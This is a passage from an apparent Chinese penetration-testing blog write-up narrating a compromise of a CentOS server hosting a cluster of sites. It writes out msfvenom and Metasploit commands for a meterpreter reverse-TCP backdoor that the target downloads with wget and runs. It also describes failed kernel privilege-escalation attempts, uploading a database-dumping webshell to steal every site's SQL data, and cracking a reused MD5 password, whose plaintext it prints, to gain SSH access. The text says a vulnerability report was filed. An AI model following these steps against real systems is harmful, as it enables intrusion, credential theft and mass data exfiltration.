不过蚁剑的这个绕过连接不太稳定,而且速度也很慢,于是琢磨着建立一个meterpreter会话尝试提权。
5、建立meterpreter 会话
在云服务器上使用msfvenom 生成一个后门:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=服务器ip LPORT=监听端口 -f elf > shell.elf
然后在服务器设置一个监听会话:
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 服务器ip
set LPORT 监听端口
run
在服务器上使用python建立一个简单的http服务:
python3 -m http.server
在目标主机使用wget下载后门文件并执行,成功获取meterpreter 会话
6、尝试提权受阻
由于目标服务器运行的是 CentOS 8.0,内核版本为 Linux 4.18.0,且我获取到的仅为一个低权限的shell,想要实现提权是很难的,在明知肯定失败的情况下我还是尝试了脏牛等所有的我手上能用的提权exp,均宣告失败,也是意料之中的事。
7、柳暗花明又一村
提权无果之后,我开始翻动服务器上的各种文件,然后发现了不得了的线索,乖乖这是个站群啊
然后我从每个站的配置文件中都得到了他们对应的数据库以及数据库账号密码,看样子应该是随机生成的,不像是会用作root用户密码的通用密码,如下图:
于是我上传了一个脱裤马,获取到了所有的数据库sql文件,尝试访问所有的数据,以寻求一个可能的通用密码,没想到还真让我找到了,在几个采集站和发卡站的库中,我找到了如下相同的md5值:
md5解密后结果为:vip886.A
尝试ssh连接服务器,成功
至此渗透结束。
8、总结
此次渗透没什么技术含量,但是足以显示出弱口令以及通用密码对于安全的危害有多大,另外上传功能的处理也是很重要的,一丁点防护都没有的上传点我是真头一回见。
漏洞报告已经交给我朋友啦,没想到还有小钱钱拿,开心。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

